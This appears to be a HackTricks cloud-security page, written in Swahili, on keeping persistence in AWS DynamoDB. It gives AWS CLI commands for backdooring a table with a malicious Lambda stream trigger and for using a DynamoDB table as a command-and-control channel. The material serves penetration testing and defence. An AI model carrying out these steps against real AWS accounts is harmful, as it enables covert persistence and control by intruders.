AWS - DynamoDB Persistence

Support HackTricks

DynamoDB

Kwa maelezo zaidi tembelea:

AWS - DynamoDB Enum

DynamoDB Triggers with Lambda Backdoor

Kutumia DynamoDB triggers, mshambuliaji anaweza kuunda mlango wa nyuma wa siri kwa kuhusisha Lambda function mbaya na jedwali. Lambda function inaweza kuchochewa wakati kipengee kinaongezwa, kubadilishwa, au kufutwa, ikimruhusu mshambuliaji kutekeleza msimbo wowote ndani ya akaunti ya AWS.

# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>

Ili kudumisha uthabiti, mshambulizi anaweza kuunda au kurekebisha vitu kwenye jedwali la DynamoDB, ambalo litasababisha Lambda function hasidi. Hii inamruhusu mshambulizi kutekeleza msimbo ndani ya akaunti ya AWS bila mwingiliano wa moja kwa moja na Lambda function.

DynamoDB kama Kituo cha C2

Mshambulizi anaweza kutumia jedwali la DynamoDB kama kituo cha amri na udhibiti (C2) kwa kuunda vitu vinavyobeba amri na kutumia mifumo au Lambda functions zilizodukuliwa kuchukua na kutekeleza amri hizi.

# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>

# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>

Instances zilizodukuliwa au Lambda functions zinaweza kuangalia mara kwa mara jedwali la C2 kwa amri mpya, kuzitekeleza, na kwa hiari kuripoti matokeo kurudi kwenye jedwali. Hii inamruhusu mshambulizi kudumisha uendelevu na udhibiti juu ya rasilimali zilizodukuliwa.

Support HackTricks

Last updated